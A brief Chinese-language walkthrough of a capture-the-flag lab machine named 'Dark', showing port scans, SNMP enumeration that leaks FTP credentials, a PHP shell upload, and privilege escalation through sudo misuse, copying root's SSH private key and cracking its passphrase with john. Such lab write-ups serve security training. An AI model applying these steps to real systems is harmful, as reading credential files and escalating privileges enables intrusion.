# 靶场搭建
下载:Dark
Nat,IP: 192.168.1.157
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | |
| ssh-hostkey: | |
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA) | |
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA) | |
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519) | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Dark | |
|_http-server-header: Apache/2.4.56 (Debian) | |
8000/tcp open ftp pyftpdlib 1.5.7 | |
| ftp-syst: | |
| STAT: | |
| FTP server status: | |
| Connected to: 192.168.1.157:8000 | |
| Waiting for username. | |
| TYPE: ASCII; STRUcture: File; MODE: Stream | |
| Data connection closed. | |
|_End of status. |
┌──(root㉿kali)-[~] | |
└─# nmap -sU 192.168.1.157 --top-ports 100 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 01:10 EDT | |
Nmap scan report for 192.168.1.157 | |
Host is up (0.00047s latency). | |
Not shown: 56 closed udp ports (port-unreach), 43 open|filtered udp ports (no-response) | |
PORT STATE SERVICE | |
161/udp open snmp |
开了 snmp,探测一下: snmp-check -v 2c -c root 192.168.1.157
在进程中拿到了 ftp 的账号密码: frank/my_FTP_is_c00l
连上去 put 一个 php 上去,拿到 shell
# 提权
sudo -u alan /usr/bin/sh 拿到 alan 的 shell
sudo most /root/.ssh/id_rsa > /tmp/id_rsa 拿到 root 的私钥
john 解一下私钥的 passphrase: rootbeer
使用私钥连接,拿到了 root 的 shell。
